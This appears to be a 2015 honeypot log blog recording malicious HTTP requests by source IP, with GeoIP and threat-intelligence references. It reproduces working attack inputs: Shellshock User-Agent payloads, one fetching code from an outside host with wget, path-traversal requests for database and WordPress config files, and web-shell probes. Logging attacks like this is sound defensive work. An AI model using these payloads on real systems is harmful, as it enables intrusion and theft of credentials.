Samstag, 12. Dezember 2015

173.193.232.34 - Shellshock code execution

BEGIN OF HTTP DATA:
2015-12-11 21:44:55
Source IP: 173.193.232.34
GET //cgi-bin/finger.cgi HTTP/1.1
Accept: */*
User-Agent: () { :;};echo; /bin/bash -c " echo 2014 | md5sum"
GET //cgi-bin/test.cgi HTTP/1.1
GET //cgi-mod/index.cgi HTTP/1.1
GET //cgi-sys/defaultwebpage.cgi HTTP/1.1
GET //cgi-sys/entropysearch.cgi HTTP/1.1
GET //cgi-sys/realsignup.cgi HTTP/1.1
GET //cgi-bin/test-cgi HTTP/1.1
GET //cgi-bin/finger.cgi HTTP/1.1

173.193.232[.]34

    Static Source: GeoIP data
  • Country: United States
  • ASN: AS36351 SoftLayer Technologies Inc.

Mittwoch, 9. Dezember 2015

14.141.81.22 - multiple *.jsp GET attempts

BEGIN OF HTTP DATA:
2015-12-08
16:48:30
Source IP: 14.141.81.22
User-Agent: Wget/1.11.4 Red Hat modified
Accept: */*
GET /zmeu/zmeu.jsp HTTP/1.0
GET /iddqd/iddqd.jsp HTTP/1.0
GET /iesvc/iesvc.jsp HTTP/1.0
GET /wstats/wstats.jsp HTTP/1.0
GET /zecmd/zecmd.jsp HTTP/1.0
GET /idsvc/idsvc.jsp HTTP/1.0
GET /wincfg/wincfg.jsp HTTP/1.0


14.141.81[.]22

    Static Source: GeoIP data
  • Country: India
  • ASN: AS4755 TATA Communications formerly VSNL is Leading ISP
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • Reference: https://isc.sans.edu/api/ip/14.141.81.22

207.200.40.116 - GET db.php

BEGIN OF HTTP DATA:
2015-12-09 01:17:38
Source IP: 207.200.40.116
GET /etc/lib/pChart2/examples/index.php?Action=View&Script=../../../../cnf/db.php HTTP/1.1
User-Agent: HTTP_Request2/2.2.1 (http://pear.php.net/package/http_request2) PHP/5.3.10-1ubuntu3.10
Host: 109.234.106.8
Accept-Encoding: gzip, deflate


 END OF DATA

207.200.40[.]116

    Static Source: GeoIP data
  • Country: United States
  • ASN: AS3728 Onramp Access Inc.
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • Reference: https://isc.sans.edu/api/ip/207.200.40.116

69.12.70.34 - GET db.php

BEGIN OF HTTP DATA:
2015-12-08 20:48:58
Source IP: 69.12.70.34
GET /etc/lib/pChart2/examples/index.php?Action=View&Script=../../../../cnf/db.php HTTP/1.1
User-Agent: HTTP_Request2/2.2.1 (http://pear.php.net/package/http_request2) PHP/5.3.3
Host: 109.234.106.8
Accept-Encoding: gzip, deflate


 END OF DATA

69.12.70[.]34

    Static Source: GeoIP data
  • Country: United States
  • ASN: AS8100 QuadraNet, Inc
    Dynamic Source: IBM X-Force Exchange
  • Score: 1.4
  • Reference: https://exchange.xforce.ibmcloud.com/ip/69.12.70.34
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • Reference: https://isc.sans.edu/api/ip/69.12.70.34

Sonntag, 6. Dezember 2015

103.238.131.21 - access attempt wp-config.php (traversel)

BEGIN OF HTTP DATA:
2015-12-06 01:42:29
Source IP: 103.238.131.21
GET //wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php HTTP/1.1
Host: 195.169.125.87
Connection: close


 END OF DATA

103.238.131[.]21

    Static Source: GeoIP data
  • Country: Australia
  • ASN: AS23352 Server Central Network
remarks:        This address range is in use by an agile cloud hosting environment.

Samstag, 5. Dezember 2015

1.32.103.224 . Shellschock Download via http://lliillii.altervista.org

BEGIN OF HTTP DATA:
2015-12-05 02:52:29
Source IP: 1.32.103.224
GET /cgi-bin/authLogin.cgi HTTP/1.1
Host: 127.0.0.1
User-Agent: () { :; }; /bin/mkdir -p /share/HDB_DATA/.../ && /usr/bin/wget -q -c http://lliillii.altervista.org/io.php 0<&1 2>&1

 END OF DATA
The server was not responding to my manually download try.

1.32.103[.]224

    Static Source: GeoIP data
  • Country: Malaysia
  • ASN: AS4788 TM Net, Internet Service Provider
    Dynamic Source: IBM X-Force Exchange
  • Score: 7.1
  • Reference: https://exchange.xforce.ibmcloud.com/ip/1.32.103.224
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • Reference: https://isc.sans.edu/api/ip/1.32.103.224